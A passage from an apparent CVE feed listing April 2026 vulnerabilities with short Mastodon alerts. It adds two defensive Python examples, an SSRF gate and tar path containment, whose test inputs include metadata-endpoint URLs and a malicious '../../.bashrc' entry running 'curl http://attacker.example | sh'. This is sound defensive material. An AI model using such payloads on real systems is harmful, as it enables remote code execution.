Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type hea...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31941
(7.7 HIGH)

EPSS: 0.03%

updated 2026-04-10T18:16:41.640000

2 posts

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal
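One URL gate covers the checks that both SSRF entries on this page name as missing, the PraisonAI `web_crawl()` case (CVE-2026-40150, above) and this Social Wall one: a scheme allowlist, rejection of literal private, loopback and link-local addresses, and the same test applied to every address a hostname resolves to. Added example, not code from either project; the policy and the constructed offline resolver are the example's own.

```python
"""URL gate for server-side fetches, covering the checks the two SSRF
advisories on this page name as missing: scheme allowlist, literal-IP and
resolved-IP blocklisting of private and link-local ranges. Added example;
not Chamilo's read_url_with_open_graph or PraisonAI's web_crawl()."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host: str) -> set:
    """Every address the host resolves to; a fetch may use any of them."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public(addr: str) -> bool:
    """Globally routable unicast only: rejects loopback, RFC1918, link-local
    (169.254.0.0/16 includes the cloud metadata endpoint), ULA, multicast."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # judge ::ffff:a.b.c.d as the IPv4 it wraps
    return ip.is_global and not ip.is_multicast


def check_url(url: str, resolver=system_resolver):
    """Return (ok, reason) for a URL an agent or user asked the server to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname
    try:
        addrs = {str(ipaddress.ip_address(host))}      # literal address
    except ValueError:
        try:
            addrs = set(resolver(host))               # hostname: check every answer
        except OSError as exc:
            return False, f"cannot resolve {host}: {exc}"
    for addr in addrs:
        if not is_public(addr):
            return False, f"{host} -> {addr} is not a public address"
    return True, "ok"


# Constructed resolver so the example runs offline; real use takes system_resolver.
FAKE_DNS = {
    "example.com": {"93.184.216.34"},
    "localhost": {"127.0.0.1", "::1"},
    "metadata.google.internal": {"169.254.169.254"},
}

if __name__ == "__main__":
    for u in ("https://example.com/page",
              "http://metadata.google.internal/computeMetadata/v1/",
              "http://169.254.169.254/latest/meta-data/",
              "file:///etc/passwd",
              "http://[::ffff:169.254.169.254]/",
              "http://localhost:8080/admin"):
        print(check_url(u, FAKE_DNS.__getitem__))
```

Two caveats the gate does not remove on its own: a host can pass this check and rebind to an internal address before the connection is made, so the address that was checked must be the one connected to, and every redirect target has to go through `check_url` again. Odd literal forms such as `2130706433` or `0x7f000001` fail `ipaddress.ip_address` and fall through to the resolver, which is the right place for them, since the libc resolver returns the loopback address they encode.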

thehackerwire@mastodon.social at 2026-04-11T05:59:55.000Z ##

🟠 CVE-2026-31941 - High (7.7)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35663
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-10T17:28:09

2 posts

## Summary Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Backend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowi

thehackerwire@mastodon.social at 2026-04-11T06:11:10.000Z ##

🟠 CVE-2026-35663 - High (8.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader scopes during backend reconnect. Attackers can bypass pairing requirements to reconnect as operator.admin, gaining unautho...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35660
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-10T17:27:04

2 posts

## Summary Before `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/new` for callers with only `operator.write`, even though the direct `sessions.reset` RPC correctly requires `operator.admin`. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: `< 2026.3.23` - Fixed: `>= 2026.3.23` - Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171

thehackerwire@mastodon.social at 2026-04-11T06:14:19.000Z ##

🟠 CVE-2026-35660 - High (8.1)

OpenClaw before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset endpoint that allows callers with operator.write permission to reset admin sessions. Attackers with operator.write privileges can invoke /r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35653
(8.1 HIGH)

EPSS: 0.04%

updated 2026-04-10T17:24:51

2 posts

> Fixed in OpenClaw 2026.3.24, the current shipping release. # Title `browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q` ## Severity Assessment High CWE: - `CWE-863: Incorrect Authorization` Proposed CVSS v3.1: - `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`) An authenticated caller who only

thehackerwire@mastodon.social at 2026-04-11T07:00:21.000Z ##

🟠 CVE-2026-35653 - High (8.1)

OpenClaw before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that allows authenticated callers with operator.write access to browser.request to bypass profile mutation restrictions. Attackers can ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40157
(0 None)

EPSS: 0.07%

updated 2026-04-10T17:17:13.457000

2 posts

PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they ru
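One containment check serves both write-path issues on this page: the `POST /sync/offline_changes` directory and `changes.json` write in Saltcorn (CVE-2026-40163, above) and this `.praison` tar extraction. Added example, not code from either project; the function names and the in-memory sample archives are constructed here. `safe_join` refuses any untrusted path whose real location falls outside the root, `sync_target` applies it to a client-supplied directory name, and `extract_checked` applies the same test to every tar member before anything is written.

```python
"""Path containment for untrusted file names and tar members.
Added example; not Saltcorn or PraisonAI code."""
import io
import os
import tarfile


def safe_join(root: str, untrusted: str) -> str:
    """Resolve untrusted under root; raise if the real path escapes root.
    realpath also collapses symlinks already present under root."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, untrusted))
    if os.path.commonpath([root_real, target]) != root_real:
        raise ValueError(f"path escapes {root!r}: {untrusted!r}")
    return target


def sync_target(sync_root: str, client_dir: str) -> str:
    """Where an offline-changes upload for client_dir may write changes.json."""
    return safe_join(sync_root, os.path.join(client_dir, "changes.json"))


def unsafe_members(tar: tarfile.TarFile, dest: str) -> list:
    """Names of members that would land outside dest, or that are links or
    device nodes (which can redirect a later member's write)."""
    bad = []
    for m in tar.getmembers():
        if m.issym() or m.islnk() or m.isdev() or os.path.isabs(m.name):
            bad.append(m.name)
            continue
        try:
            safe_join(dest, m.name)
        except ValueError:
            bad.append(m.name)
    return bad


def extract_checked(tar_bytes: bytes, dest: str) -> list:
    """Extract only when every member passes; return the extracted names."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        bad = unsafe_members(tar, dest)
        if bad:
            raise ValueError(f"refusing archive, unsafe members: {bad}")
        # Python 3.12+ (and patched 3.8-3.11) ships the 'data' filter; use it
        # as a second line of defence where available.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, **kwargs)
        return [m.name for m in tar.getmembers()]


def build_archive(entries: dict) -> bytes:
    """Constructed sample: {member_name: bytes} packed into an uncompressed tar."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


BENIGN = build_archive({"recipe.yaml": b"name: demo\n", "tools/helper.py": b"pass\n"})
MALICIOUS = build_archive({"recipe.yaml": b"name: demo\n",
                           "../../.bashrc": b"curl http://attacker.example | sh\n"})

if __name__ == "__main__":
    import tempfile
    out = tempfile.mkdtemp()
    print("benign   :", extract_checked(BENIGN, out))
    try:
        extract_checked(MALICIOUS, out)
    except ValueError as exc:
        print("malicious:", exc)
    print("sync dir :", sync_target(out, "device-1"))
```

Checking all members before extracting any matters: a per-member check that extracts as it goes has already written the benign files (and any symlink that passed) by the time a bad member is reached. For the sync endpoint the same `safe_join` result is what `os.makedirs` and the file write should receive, and the whole endpoint still needs authentication; containment only limits where an anonymous caller can write, not whether they may.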

offseq@infosec.exchange at 2026-04-11T07:30:28.000Z ##

🚨 CRITICAL: CVE-2026-40157 in PraisonAI (<4.5.128) enables path traversal via malicious .praison bundles — risk: file overwrite & code execution. Patch to 4.5.128+ & avoid untrusted archives. Full details: radar.offseq.com/threat/cve-20 #OffSeq #PraisonAI #infosec #vuln

##

CVE-2026-35669
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T17:17:09.240000

2 posts

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary bypass to gain elevated privileges and perform unauthorized administrative actions.

thehackerwire@mastodon.social at 2026-04-11T06:11:00.000Z ##

🟠 CVE-2026-35669 - High (8.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary b...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35668
(7.7 HIGH)

EPSS: 0.05%

updated 2026-04-10T17:17:09.060000

4 posts

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit incomplete parameter validation in normalizeSandboxMediaParams and missing mediaLocalRoots context to access sensitive files including API keys and configur

thehackerwire@mastodon.social at 2026-04-11T06:14:10.000Z ##

🟠 CVE-2026-35668 - High (7.7)

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit inc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-11T06:11:01.000Z ##

🟠 CVE-2026-35668 - High (7.7)

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit inc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35650
(7.5 HIGH)

EPSS: 0.06%

updated 2026-04-10T17:17:05.627000

2 posts

OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed override keys that slip through inconsistent validation to execute arbitrary code with unintended environment variables.

thehackerwire@mastodon.social at 2026-04-11T07:00:35.000Z ##

🟠 CVE-2026-35650 - High (7.5)

OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed overri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6067
(7.5 HIGH)

EPSS: 0.06%

updated 2026-04-10T16:16:36.437000

2 posts

A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due to a lack of bounds checking in the obj_directive() function. This vulnerability can be exploited by a user assembling a malicious .asm file, potentially leading to heap memory corruption, denial of service (crash), and arbitrary code execution.

thehackerwire@mastodon.social at 2026-04-11T07:03:27.000Z ##

🟠 CVE-2026-6067 - High (7.5)

A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due to a lack of bounds checking in the obj_directive() function. This vulnerability can be exploited by a user assembling a malicious .asm file, potentially leading to he...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-58913
(8.1 HIGH)

EPSS: 0.11%

updated 2026-04-10T15:32:07

2 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion. This issue affects VideoPro: from n/a through 2.3.8.1.

thehackerwire@mastodon.social at 2026-04-11T07:04:51.000Z ##

🟠 CVE-2025-58913 - High (8.1)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion. This issue affects VideoPro: from n/a through 2.3.8.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40217
(8.8 HIGH)

EPSS: 0.19%

updated 2026-04-10T15:32:07

2 posts

LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via bytecode rewriting at the /guardrails/test_custom_code URI.

thehackerwire@mastodon.social at 2026-04-11T07:03:37.000Z ##

🟠 CVE-2026-40217 - High (8.8)

LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via bytecode rewriting at the /guardrails/test_custom_code URI.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33092
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T15:32:05

2 posts

Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.

thehackerwire@mastodon.social at 2026-04-11T07:04:41.000Z ##

🟠 CVE-2026-33092 - High (7.8)

Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40088
(9.7 CRITICAL)

EPSS: 0.05%

updated 2026-04-10T14:41:51

1 post

The `execute_command` function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters. --- ## Description PraisonAI's workflow system and command execution tools pass user-controlled input directly to `subprocess.run()` with `shell=Tr

thehackerwire@mastodon.social at 2026-04-10T07:10:58.000Z ##

🔴 CVE-2026-40088 - Critical (9.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.121, the execute_command function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-5804
(7.5 HIGH)

EPSS: 0.07%

updated 2026-04-10T14:16:25.450000

2 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion. This issue affects Case Theme User: from n/a before 1.0.4.

thehackerwire@mastodon.social at 2026-04-11T07:05:02.000Z ##

🟠 CVE-2025-5804 - High (7.5)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion. This issue affects Case Theme User: from n/a before 1.0.4.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5412
(9.9 CRITICAL)

EPSS: 0.04%

updated 2026-04-10T13:16:45.780000

2 posts

In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privileged user to access sensitive credentials. This issue is resolved in Juju versions 2.9.57 and 3.6.21.

thehackerwire@mastodon.social at 2026-04-11T07:06:33.000Z ##

🔴 CVE-2026-5412 - Critical (9.9)

In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1115
(9.6 CRITICAL)

EPSS: 0.04%

updated 2026-04-10T13:16:43.970000

1 post

A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious Jav

offseq@infosec.exchange at 2026-04-10T09:00:31.000Z ##

⚠️ CVE-2026-1115: CRITICAL stored XSS in parisneo/lollms <2.2.0. Unsanitized input in create_post lets attackers run JS in user browsers via Home Feed. Upgrade to 2.2.0+ now! radar.offseq.com/threat/cve-20 #OffSeq #XSS #Vuln #Security

##

CVE-2026-6029
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T09:31:21

1 post

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument User results in os command injection. The attack may be launched remotely. The exploit is now public and may be used.

offseq@infosec.exchange at 2026-04-10T07:30:30.000Z ##

⚠️ CVE-2026-6029 (CRITICAL, CVSS 9.3): Totolink A7100RU firmware 7.4cu.2313_b20191024 is vulnerable to unauthenticated OS command injection via setVpnAccountCfg. No patch yet — restrict access and monitor for updates. radar.offseq.com/threat/cve-20 #OffSeq #CVE20266029 #Infosec

##

CVE-2026-6025
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T06:31:49

1 post

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setSyslogCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-10T06:59:55.000Z ##

🔴 CVE-2026-6025 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setSyslogCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6016
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T06:31:44

1 post

A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the function decodePwd of the file /goform/WizardHandle of the component POST Request Handler. Performing a manipulation of the argument WANS results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-10T07:00:15.000Z ##

🟠 CVE-2026-6016 - High (8.8)

A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the function decodePwd of the file /goform/WizardHandle of the component POST Request Handler. Performing a manipulation of the argument WANS results in stack-based buffer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6014
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T06:31:44

1 post

A flaw has been found in D-Link DIR-513 1.10. This issue affects the function formAdvanceSetup of the file /goform/formAdvanceSetup of the component POST Request Handler. This manipulation of the argument webpage causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer support

thehackerwire@mastodon.social at 2026-04-10T05:46:35.000Z ##

🟠 CVE-2026-6014 - High (8.8)

A flaw has been found in D-Link DIR-513 1.10. This issue affects the function formAdvanceSetup of the file /goform/formAdvanceSetup of the component POST Request Handler. This manipulation of the argument webpage causes buffer overflow. It is poss...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6013
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T06:31:44

1 post

A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects the function formSetRoute of the file /goform/formSetRoute of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported

thehackerwire@mastodon.social at 2026-04-10T05:46:25.000Z ##

🟠 CVE-2026-6013 - High (8.8)

A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects the function formSetRoute of the file /goform/formSetRoute of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6015
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T06:16:06.510000

1 post

A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the function formQuickIndex of the file /goform/QuickIndex of the component POST Request Handler. Such manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-10T07:00:05.000Z ##

🟠 CVE-2026-6015 - High (8.8)

A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the function formQuickIndex of the file /goform/QuickIndex of the component POST Request Handler. Such manipulation of the argument PPPOEPassword leads to stack-based buffer over...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6012
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T05:16:07.027000

1 post

A security vulnerability has been detected in D-Link DIR-513 1.10. This affects the function formSetPassword of the file /goform/formSetPassword of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products

thehackerwire@mastodon.social at 2026-04-10T05:46:15.000Z ##

🟠 CVE-2026-6012 - High (8.8)

A security vulnerability has been detected in D-Link DIR-513 1.10. This affects the function formSetPassword of the file /goform/formSetPassword of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overfl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5994
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T03:31:16

2 posts

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument telnet_enabled results in os command injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-10T06:00:28.000Z ##

⚠️ CVE-2026-5994: CRITICAL OS command injection in Totolink A7100RU (7.4cu.2313_b20191024). Remote attackers can run OS commands via setTelnetCfg. No patch yet; public exploit released. Restrict access & monitor traffic. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #RouterSecurity

##

thehackerwire@mastodon.social at 2026-04-10T03:03:00.000Z ##

🔴 CVE-2026-5994 - Critical (9.8)

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument telnet_enabled resu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5996
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T03:31:16

2 posts

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tty_server leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.

offseq@infosec.exchange at 2026-04-10T04:30:29.000Z ##

⚠️ CRITICAL: CVE-2026-5996 in Totolink A7100RU (7.4cu.2313_b20191024) enables unauthenticated OS command injection via /cgi-bin/cstecgi.cgi. No patch yet — restrict remote access & monitor devices. More: radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #IoTSecurity

##

thehackerwire@mastodon.social at 2026-04-10T03:01:02.000Z ##

🔴 CVE-2026-5996 - Critical (9.8)

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tty_serve...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5993
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T03:31:16

1 post

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setWiFiGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wifiOff leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-10T03:27:55.000Z ##

🔴 CVE-2026-5993 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setWiFiGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wifiOff leads to os c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25203
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T03:31:16

1 post

Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability This issue affects MagicINFO 9 Server: less than 21.1091.1.

thehackerwire@mastodon.social at 2026-04-10T03:02:50.000Z ##

🟠 CVE-2026-25203 - High (7.8)

Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability

This issue affects MagicINFO 9 Server: less than 21.1091.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4351
(8.1 HIGH)

EPSS: 0.06%

updated 2026-04-10T03:31:16

1 post

The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite via path traversal in all versions up to, and including, 2.5.9. This is due to the `PMCS::action_handler()` method processing the bulk action `activate`/`deactivate` handlers without any authorization check or nonce verification. The `$_GET['snippets'][]` values are passed unsanitized to `Snippet::activate()`/`Snippet::

thehackerwire@mastodon.social at 2026-04-10T03:02:39.000Z ##

🟠 CVE-2026-4351 - High (8.1)

The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite via path traversal in all versions up to, and including, 2.5.9. This is due to the `PMCS::action_handler()` method processing the bulk action `activate`/`deactivate` ha...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3360
(7.5 HIGH)

EPSS: 0.10%

updated 2026-04-10T03:31:16

1 post

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fie

thehackerwire@mastodon.social at 2026-04-10T03:01:23.000Z ##

🟠 CVE-2026-3360 - High (7.5)

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pa...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5997
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T02:16:04.247000

2 posts

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass results in os command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:01:14.000Z ##

🔴 CVE-2026-5997 - Critical (9.8)

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass results in os c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-10T03:00:28.000Z ##

